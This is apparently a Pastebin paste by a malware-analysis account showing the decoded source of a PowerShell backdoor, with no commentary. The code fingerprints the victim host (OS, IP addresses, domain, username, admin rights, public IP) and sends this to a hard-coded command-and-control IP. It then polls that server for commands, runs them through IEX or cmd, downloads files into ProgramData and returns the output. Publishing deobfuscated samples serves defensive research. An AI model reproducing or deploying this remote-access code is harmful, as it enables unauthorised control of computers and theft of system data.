dissectmalware

Mal PowerShell after 36 round decoding

Mar 3rd, 2019
587
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. $global:url = ""$global:id = ""$cevingr = 959, 713$choyvp = 37, 437$C = @('http://162.223.89.53')function Zbq($x, $H, $n){    $Xi = $x    $Ei = $H    $Yi = 1    while($Ei -gt 0){        if(($Ei % 2) -eq 0) {            $Xi = ($Xi * $Xi) % $n            $Ei = $Ei / 2        } else {            $Yi = ($Xi * $Yi) % $n            $Ei = $Ei - 1        }    }    return $Yi}function raPelcg($pk, $cynvagrkg){    try{        $xrl, $n = $pk;        $zlneenl = @();        for($i=0; $i -lt $cynvagrkg.Length; $i++){            $ahz = [int][char]$cynvagrkg[$i]            $t = Zbq $ahz $xrl $n            $zlneenl += $t        }        return $zlneenl    }    catch{        trgEnaqbzCebkl    }}function qrPelcg($pk, $pvcuregrkg){    try{         $xrl, $n = $pk;         $zl_neenl = @();         for ($i = 0 ; $i -lt $pvcuregrkg.Length; $i++){            $ahz = [int]$pvcuregrkg[$i]            $t =  Zbq $ahz $xrl $n            $zl_neenl += [convert]::ToChar([int]$t)         }         return -join $zl_neenl       }    catch{trgEnaqbzCebkl       }}function uggcCBFG($hey,$rap_zft){    trgEnaqbzCebkl try{$pbagrag = $rap_zft$jroerd = [System.Net.WebRequest]::Create($global:url + $hey);$jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy()$jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials$rapbqr_qngn = [System.Text.Encoding]::UTF8.GetBytes($pbagrag);$jroerd.Method = "POST";$jroerd.ContentLength = $rapbqr_qngn.length;        $jroerd.ContentType = "application/json"if ($rapbqr_qngn.Length -gt 0){$erd_fgernz = $jroerd.GetRequestStream();$erd_fgernz.Write($rapbqr_qngn, 0, $rapbqr_qngn.Length);}[System.Net.WebResponse] $erfc = $jroerd.GetResponse();if ($erfc -ne $null){$qngn = $erfc.GetResponseStream();[System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn;[String] $erfhyg = $erf_qngn.ReadToEnd();}} catch {$erfhyg = "error"        write-host $hey "`t" ($global:url + $_.Exception.Message)        trgEnaqbzCebkl        start-sleep (Get-Random -Minimum 20 -Maximum 40)}return $erfhyg}function uggcTRG($hey){    trgEnaqbzCebkltry{$jroerd = [System.Net.WebRequest]::Create($global:url + $hey);$jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy()$jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials$jroerd.Method = "GET";[System.Net.WebResponse] $erfc = $jroerd.GetResponse();if ($erfc -ne $null){$qngn = $erfc.GetResponseStream();[System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn;[String] $erfhyg = $erf_qngn.ReadToEnd();}} catch {$erfhyg = "error"        write-host $hey "`t" ($global:url + $_.Exception.Message)        trgEnaqbzCebkl        start-sleep (Get-Random -Minimum 20 -Maximum 40)}return $erfhyg  }function fuggcTRG($hey){try{$jroerd = [System.Net.WebRequest]::Create($hey);$jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy()$jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials$jroerd.Method = "GET";[System.Net.WebResponse] $erfc = $jroerd.GetResponse();if ($erfc -ne $null){$qngn = $erfc.GetResponseStream();[System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn;[String] $erfhyg = $erf_qngn.ReadToEnd();}}catch {    $erfhyg = ""}return $erfhyg  }function Riny($pzq){    try{        $bhg = IEX $pzq -ErrorAction SilentlyContinue        if($pzq.StartsWith("cd")){$bhg = $PWD;}        $bhg = ($bhg | Out-String)    } catch {        $bhg = $_.Exception.Message    }    return $bhg}function vasbvavg(){    function trgVC(){    try{    $vcf = ""    Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | Where{$_.IPAddress[0] -NotLike '169*'} | % {$vcf = $vcf + "-" + $_.IPAddress[0]}    return $vcf.substring(1);    } catch {    return "ErrorIP";    }    }    function trgBF(){    try{    return (Get-WmiObject Win32_OperatingSystem).Name;    } catch {    return "ErrorOS";    }    }    function trgNepu(){    try{    return  (Get-WmiObject Win32_OperatingSystem).OSArchitecture;    } catch {    return "ErrorArch";    }    }    function trgQbznva(){    try{    return (Get-WmiObject Win32_ComputerSystem).Domain;    } catch {    return "ErrorDomain";    }    }    function trgUbfgAnzr(){    try{    return (Get-WmiObject Win32_ComputerSystem).Name;    } catch {    return "ErrorHostName";    }    }    function trgHfreanzr(){        try{            try{                $sfb = New-Object -ComObject Scripting.FileSystemObject;                $hfre = $env:UserName                $ghfre = $hfre.replace('[^a-zA-Z0-9]','')                if($ghfr -eq $hfre){                    return $hfre                }                return ($sfb.getfolder('c:\\users\\' + $env:UserName).ShortName)            } catch {                return $env:UserName            }         } catch {            return "-"        }    }    function vfNqzva(){        try{            $JvaqbjfVqragvgl = [system.security.principal.windowsidentity]::GetCurrent()            $Cevapvcny = New-Object System.Security.Principal.WindowsPrincipal($JvaqbjfVqragvgl)            $NqzvaEbyr = [System.Security.Principal.WindowsBuiltInRole]::Administrator            if ($Cevapvcny.IsInRole($NqzvaEbyr))            {                return '+'            }            else            {                return ''            }        } catch {            return ""          }    }    function trgCVC(){        try{            $ernyVC = fuggcTRG "http://ipv4bot.whatismyipaddress.com/"            return $ernyVC        } catch {            return "ErrorPublicIP"          }    }    $FlfVasb = trgBF    $FlfVasb += "**"    $FlfVasb += trgVC    $FlfVasb += "**"    $FlfVasb += trgNepu    $FlfVasb += "**"    $FlfVasb += trgUbfgAnzr    $FlfVasb += "**"    $FlfVasb += trgQbznva    $FlfVasb += "**"    $FlfVasb += vfNqzva    $FlfVasb += trgHfreanzr    $FlfVasb += "**"    $FlfVasb += trgCVC    $global:id = zq5trarengbe($FlfVasb)    return ($global:id + '**' + $FlfVasb)}function zq5trarengbe($fgeVa){    $zq5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider    $hgs8 = new-object -TypeName System.Text.UTF8Encoding    $unfu = [System.BitConverter]::ToString($zq5.ComputeHash($hgs8.GetBytes($fgeVa)))    $bhgchg = $unfu.replace('-','')    return $bhgchg}function pbzznaq_naq_pbageby($pzq){    try{            if($pzq.StartsWith('upload')){        try{                $pzq=$pzq.replace('upload ','')            $wc = New-Object System.Net.WebClient                $wc.proxy = [Net.WebRequest]::GetSystemWebProxy()                $wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials          $wc.DownloadFile($pzq, ("c:\programdata\" + $pzq.Substring($pzq.LastIndexOf('/'),$pzq.Length-$pzq.LastIndexOf('/'))))        return Riny "pwd"         }catch{         return $_.Exception.Message        }         }        elseif($pzq.StartsWith('cmd')){            $pzq=$pzq.replace('cmd ','')            try{                $bhg = cmd /c $pzq                $bhg = $bhg | Out-String                return $bhg            } catch {                return $_.Exception.Message            }        }        elseif($pzq.StartsWith('b64')){            $pzq=$pzq.replace('b64 ','')            try{                $pzq = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($pzq))                $bhg = Riny $pzq                $bhg = $bhg | Out-String                return $bhg            } catch {                return $_.Exception.Message            }        }        else {            return Riny $pzq        }    }    catch{        return $_.Exception.Message    }}function trgEnaqbzCebkl(){$eaq = Get-Random -minimum 0 -maximum ($C.Length)$global:url = $C[$eaq]}function ertChfu([string]$p, [string]$k, [string]$v){    try{        New-ItemProperty -Path $p -Name $k -Value $v -Force -ErrorAction SilentlyContinue | Out-Null    }    catch {                return "error"    }}function ertvfgre(){    while($true) {Write-Host "R-I"        $vasb = vasbvavg        $vasb = raPelcg $cevingr $vasb        $vasb = ('{"data":"' + $vasb + '"}')                $vasb = uggcCBFG ("/oa/") $vasb        if($vasb -eq '"done"'){            break        } else {            start-sleep 30        }        Write-Host "R-O"    }}ertvfgrewhile($true){    write-host "W-I"    try{$pzq = uggcTRG ("/oc/api/?t=" + $global:id)if ($pzq.Length -gt 0){            $pzq = $pzq.substring(1,$pzq.Length-2)$pzq = $pzq -split "~~!!~~"            $pvq = $pzq[0]            $pzq = $pzq[1]                        $erfhyg = pbzznaq_naq_pbageby $pzq            if($erfhyg.Length -le 1){                $erfhyg = "NULL"            }            $erfhyg = [Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes($erfhyg))            $erfhyg = ($pvq + ':' + $erfhyg)            $nqqe = ('/or/?t=' + $global:id)            $qngn = ('{"data":"' + $erfhyg + '"}')    $erfhyg = uggcCBFG $nqqe $qngn        }    }    catch{        trgEnaqbzCebkl        continue    }    write-host "W-O"    start-sleep 300}
Add Comment
Please, Sign In to add comment